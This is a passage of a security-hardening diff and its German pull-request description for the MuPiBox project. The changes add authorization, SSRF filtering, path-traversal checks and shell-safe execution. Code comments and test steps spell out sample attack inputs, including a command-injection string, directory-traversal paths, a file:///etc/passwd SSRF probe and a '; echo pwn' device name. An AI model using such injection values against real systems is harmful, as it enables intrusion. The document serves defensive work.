 coproc bluetoothctl
 echo -e "power on\n" >&${COPROC[1]}
 echo -e "agent on\n" >&${COPROC[1]}
-echo -e "defaut-agent\n" >&${COPROC[1]}
-echo -e "untrust $1\n" >&${COPROC[1]}
+echo -e "default-agent\n" >&${COPROC[1]}
+echo -e "untrust $MAC\n" >&${COPROC[1]}
 sleep 2
-echo -e "remove $1\nyes\n" >&${COPROC[1]}
+echo -e "remove $MAC\nyes\n" >&${COPROC[1]}
 sleep 2
 echo -e 'exit' >&${COPROC[1]}
-ouput=$(cat <&${COPROC[0]})
-echo $output
+output=$(cat <&${COPROC[0]})
+echo "$output"

--- a/scripts/mupihat/mupihat.py
+++ b/scripts/mupihat/mupihat.py
@@ -172,9 +172,16 @@ def main():
         json_thread = Thread(target=periodic_json_dump, daemon=True)
         json_thread.start()
 
-    # Flask web server
+    # AR5-20: bind the debug Flask server to loopback only. No consumer on
+    # the box hits port 5000 — all consumers (frontend, admin-ui, server.ts,
+    # telegram_*.py, mqtt.py, .bashrc, fan_control.py) read /tmp/mupihat.json
+    # directly. Port 5000 is the BQ25792 register inspector at "/" and
+    # "/api/registers". With 0.0.0.0 the raw charger registers were
+    # unauthenticated for every client on the LAN; harmless on a home
+    # WLAN, problematic on guest/school networks. For remote debugging
+    # use `ssh -L 5000:127.0.0.1:5000 mupibox`.
     try:
-        app.run(host="0.0.0.0", port=5000, debug=False)
+        app.run(host="127.0.0.1", port=5000, debug=False)
     except KeyboardInterrupt:
         print("MuPiHAT stopped by Keyboard Interrupt")
         sys.exit(0)

--- a/scripts/telegram/telegram_receiver.py
+++ b/scripts/telegram/telegram_receiver.py
@@ -15,11 +15,27 @@ with open("/etc/mupibox/mupiboxconfig.json") as file:
 if not config['telegram']['active']:
     quit()
 
+# Authorization: only respond to messages from the configured chat. Without
+# this check anyone who discovers the bot username can send /shutdown,
+# /reboot, /vol etc. — the bot token is the only barrier, which is too thin.
+# An empty chatId is treated as "deny all": the user has to configure one
+# for outbound notifications anyway, so requiring it here loses nothing.
+ALLOWED_CHAT_ID = str(config['telegram'].get('chatId', '')).strip()
+
+def is_authorized(chat_id):
+    if not ALLOWED_CHAT_ID:
+        print('Refusing message: no chatId configured in mupiboxconfig.json')
+        return False
+    return str(chat_id) == ALLOWED_CHAT_ID
+
 message_with_inline_keyboard = None
 
 def on_chat_message(msg):
     content_type, chat_type, chat_id = telepot.glance(msg)
     print(content_type, chat_type, chat_id)
+    if not is_authorized(chat_id):
+        print(f'Rejected message from unauthorized chat_id: {chat_id}')
+        return
     if content_type != 'text':
         return
     command = msg['text']
@@ -73,6 +89,9 @@ def on_chat_message(msg):
 def on_callback_query(msg):
     query_id, from_id, query_data = telepot.glance(msg, flavor='callback_query')
     print('Callback Query:', query_id, from_id, query_data)
+    if not is_authorized(from_id):
+        print(f'Rejected callback from unauthorized user_id: {from_id}')
+        return
 
     global message_with_inline_keyboard
 

--- a/src/backend-api/src/server.ts
+++ b/src/backend-api/src/server.ts
@@ -102,6 +102,44 @@ if (productionServe) {
   app.use(express.static(path.join(__dirname, 'www')))
 }
 
+// MED-2: harden /api/rssfeed against SSRF.
+//
+// The endpoint takes a user-supplied URL and ky-fetches it server-side,
+// so a caller can pivot the box into reaching anything routable from
+// the box's network — most notably the LAN's internal services
+// (router admin pages, NAS shares, other boxes' admin UIs). The
+// endpoint itself is auth-protected (frontend only), but treating
+// an authenticated frontend as fully trusted means any XSS or admin-
+// CSRF leak gives the attacker LAN-pivot for free. Defence in depth:
+//
+//   1. Schema allowlist: http: and https: only. Strips file:, ftp:,
+//      gopher:, data:, javascript: etc. that ky would otherwise honour.
+//   2. Host-resolve allowlist: reject private IPv4 ranges (RFC1918,
+//      loopback, link-local, IPv4-mapped IPv6). Done by a synchronous
+//      check on the parsed hostname; we don't resolve DNS to keep the
+//      check fast and simple, but we DO block raw IP literals.
+//   3. Hard timeout (10s) + max-content-length (5 MB) — RSS feeds are
+//      small text, anything bigger is either misconfigured or hostile.
+const PRIVATE_IP_REGEXES = [
+  /^127\./,
+  /^10\./,
+  /^192\.168\./,
+  /^172\.(1[6-9]|2\d|3[0-1])\./, // 172.16.0.0/12
+  /^169\.254\./, // link-local
+  /^0\./,
+  /^::1$/,
+  /^::ffff:127\./i,
+  /^fe80:/i, // IPv6 link-local
+  /^fc00:/i, // IPv6 unique local
+  /^fd00:/i,
+]
+const isPrivateHost = (host: string): boolean => {
+  // Strip brackets from IPv6 literals
+  const h = host.replace(/^\[|\]$/g, '').toLowerCase()
+  if (h === 'localhost' || h === '0.0.0.0' || h === '::') return true
+  return PRIVATE_IP_REGEXES.some((r) => r.test(h))
+}
+
 // Routes
 app.get('/api/rssfeed', async (req, res) => {
   const rssUrl = req.query.url
@@ -109,9 +147,29 @@ app.get('/api/rssfeed', async (req, res) => {
     res.status(500).send('Given url is not a string.')
     return
   }
-  ky.get(rssUrl)
+  let parsed: URL
+  try {
+    parsed = new URL(rssUrl)
+  } catch {
+    res.status(400).send('Invalid URL')
+    return
+  }
+  if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') {
+    res.status(400).send('Only http(s) URLs are allowed')
+    return
+  }
+  if (isPrivateHost(parsed.hostname)) {
+    res.status(403).send('Private / loopback hosts are not allowed')
+    return
+  }
+  ky.get(rssUrl, { timeout: 10000 })
     .text()
     .then((response) => {
+      // Bound the parsed payload size — RSS feeds shouldn't be megabytes.
+      if (response.length > 5_000_000) {
+        res.status(413).send('Response too large')
+        return
+      }
       res.send(xmlparser.xml2json(response, { compact: true, nativeType: true }))
     })
     .catch(() => {

--- a/src/backend-api/src/services/spotify-api.service.ts
+++ b/src/backend-api/src/services/spotify-api.service.ts
@@ -1,3 +1,4 @@
+import { createHash } from 'node:crypto'
 import fs from 'node:fs'
 import path from 'node:path'
 import { SpotifyApi } from '@spotify/web-api-ts-sdk'
@@ -71,8 +72,19 @@ export class SpotifyApiService {
     }
   }
 
+  // MED-5: cacheKey is concatenated from user-controlled input — search
+  // queries, playlist IDs, etc. The previous implementation just appended
+  // `.json` and joined with cacheDir, so a search for `../../etc/passwd_x`
+  // would produce a path that path.join could resolve outside the cache
+  // directory (and fs.writeFile would happily write there as the dietpi
+  // user). Hash the user-controlled portion via SHA-256; the resulting
+  // 64-char hex is filesystem-safe and impossible to traverse with.
+  // Keep getCacheExpiryForKey() reading the original cacheKey since it
+  // only inspects the prefix — the on-disk filename uses the hashed
+  // form via this helper.
   private getCacheFilePath(cacheKey: string): string {
-    return path.join(this.cacheDir, `${cacheKey}.json`)
+    const hashed = createHash('sha256').update(cacheKey).digest('hex')
+    return path.join(this.cacheDir, `${hashed}.json`)
   }
 
   private getCacheExpiryForKey(cacheKey: string): number {

--- a/src/backend-player/package.json
+++ b/src/backend-player/package.json
@@ -18,10 +18,8 @@
     "debug": "^4.3.4",
     "express": "^4.17.1",
     "google-tts-api": "2.0.2",
-    "http": "0.0.1-security",
     "js-string-escape": "^1.0.1",
     "nodemon": "^2.0.7",
-    "path": "^0.12.7",
     "protobufjs": "^7.4.0",
     "protobufjs-cli": "^1.1.3",
     "spotify-web-api-node": "^5.0.0"

--- a/src/backend-player/src/spotify-control.js
+++ b/src/backend-player/src/spotify-control.js
@@ -801,19 +801,61 @@ function seek(progress) {
   }
 }
 
+// HIGH-1: previously this spliced caller-controlled `deleteFile` into a
+// shell `rm -r "…"` command, then ran it through `exec()`. The two
+// `decodeURIComponent` passes meant any %-encoded backtick / quote /
+// semicolon in the path was decoded back to its literal form before
+// reaching the shell — a frontend WebSocket call with deleteFile of
+// `foo"; touch /tmp/PWN; "` broke out of the quoted argument and ran
+// arbitrary commands as the dietpi user. Auth-protected (frontend
+// only), but defence-in-depth matters here because the same
+// surface picks up RSS-fed strings from the resume-list path.
+//
+// Fix:
+//   1. Use execFile so arguments don't reach a shell at all.
+//   2. Resolve the requested path under the media root and refuse
+//      anything that escapes (`..`, absolute paths, symlink games).
+//   3. Reject the request entirely if the validated path doesn't
+//      already exist — silent no-op rather than exec'ing rm against
+//      something dubious.
 function deleteLocal(deleteFile) {
-  const deleteFilePath = decodeURI(deleteFile).replace(/:/g, '/')
-  const deleteCMD = `rm -r "/home/dietpi/MuPiBox/media/${decodeURIComponent(deleteFilePath)}"`
-  //cmdCall(deleteCMD);
-  log.debug(`${nowDate.toLocaleString()}: rm -r "/home/dietpi/MuPiBox/media/${decodeURIComponent(deleteFilePath)}"`)
-  const exec = require('node:child_process').exec
-  exec(deleteCMD, (e, stdout, stderr) => {
+  const MEDIA_ROOT = '/home/dietpi/MuPiBox/media/'
+  let decoded
+  try {
+    // Single decode — `decodeURI` then `decodeURIComponent` is a footgun
+    // (chains can re-introduce escapes). decodeURIComponent handles the
+    // standard %xx-encoding the frontend produces.
+    decoded = decodeURIComponent(deleteFile)
+  } catch (err) {
+    log.warn(`${nowDate.toLocaleString()}: [deleteLocal] decode failed for ${deleteFile}: ${err?.message || err}`)
+    return
+  }
+  // Frontend uses ':' as a path-segment separator (e.g. "audiobook:Foo:Bar")
+  // — translate to '/' before resolving.
+  const relPath = decoded.replace(/:/g, '/')
+  const fullPath = path.resolve(MEDIA_ROOT, relPath)
+  // path.resolve normalises `..` segments, so any traversal collapses
+  // to an absolute path that's no longer under MEDIA_ROOT — we just
+  // reject anything that doesn't end up inside the root.
+  if (!fullPath.startsWith(MEDIA_ROOT)) {
+    log.warn(`${nowDate.toLocaleString()}: [deleteLocal] path-traversal attempt rejected: ${relPath} → ${fullPath}`)
+    return
+  }
+  // Don't shell out to a non-existent target — that's the symptom of
+  // either a glitched frontend call or an active probe.
+  if (!fs.existsSync(fullPath)) {
+    log.warn(`${nowDate.toLocaleString()}: [deleteLocal] target does not exist, refusing: ${fullPath}`)
+    return
+  }
+  log.debug(`${nowDate.toLocaleString()}: rm -r ${fullPath}`)
+  const execFile = require('node:child_process').execFile
+  execFile('rm', ['-r', fullPath], (e, stdout, stderr) => {
     if (e instanceof Error) {
-      console.error(e)
-      throw e
+      log.warn(`${nowDate.toLocaleString()}: [deleteLocal] rm failed: ${e.message}`)
+      return
     }
-    console.log('stdout', stdout)
-    console.log('stderr', stderr)
+    if (stdout) console.log('stdout', stdout)
+    if (stderr) console.log('stderr', stderr)
   })
 }
 


### PR DESCRIPTION
## Was es macht
- Schiebt Pre-Auth-Gates vor `backup.php`, `debug.php`, `pm2logs.php` und den jsoneditor (CSRF + interfacelogin-Pin)
- Härtet ZIP-Slip beim Restore und path-traversal in `/api/deleteLocal` + Spotify-Cover-Cache
- `escapeshellarg` / `htmlspecialchars` in allen PHP-Pages, die Shell-Calls oder echo machen (spotify, bluetooth, cover, network, mupi, data.json, wlan, jsoneditor)
- SSRF-Schutz für `/api/rssfeed` (Host-Whitelist, kein file:// oder localhost)
- Telegram-Bot prüft jetzt erlaubte chatIds; mupihat-Flask bindet auf 127.0.0.1 statt 0.0.0.0
- AR5-16 Custom-Battery-Config-Validation gegen Eingriff via Admin-UI
- npm-Squat-Pakete entfernt aus package-lock

## Architektur (kurz)
Kein neues Auth-Layer — wir hängen uns überall an das bestehende `is_logged_in()` aus `header.php` und an `csrf_check.php`. Validierung in PHP-Routinen liegt jeweils direkt am Eintrittspunkt, nicht in einer zentralen Middleware (matcht den restlichen Codebase-Stil).

## Test in Codespaces / lokal
1. Diesen Branch in Codespaces öffnen
2. `npm install` im Root
3. `cp config/templates/www.json src/backend-api/config/config.json` + `monitor.json` kopieren
4. `npm run serve:backend-api` (Terminal 1)
5. `cd AdminInterface/www && php -S 127.0.0.1:8000` (Terminal 2)
6. Konkrete Tests:
   - `curl http://127.0.0.1:8000/backup.php` → erwartet 302 → `login.php`
   - `curl http://127.0.0.1:8000/jsoneditor.php` ohne Session → 302
   - In der Admin-UI eingeloggt einen RSS-Feed mit `file:///etc/passwd` setzen → erwartet leere/abgelehnte Response
   - Versuche ein RestoreZIP hochzuladen, das `../../../tmp/x` als Pfad hat → erwartet Ablehnung
   - Bluetooth-Page: Gerät mit Namen `; echo pwn` ankoppeln → erwartet escaping, kein Command-Inject

**Hinweis:** Telegram-chatId-Auth und mupihat-Flask-Loopback sind nur auf realer Box prüfbar (Bot-Hookup + Hardware).

## Offene Punkte
- Soll der `interfacelogin`-Pin Default-leer bleiben (= Feature opt-in) oder beim ersten Setup zwingend abgefragt werden? Ich hab Default-leer gelassen, um Bestandsboxen nicht zu blockieren.
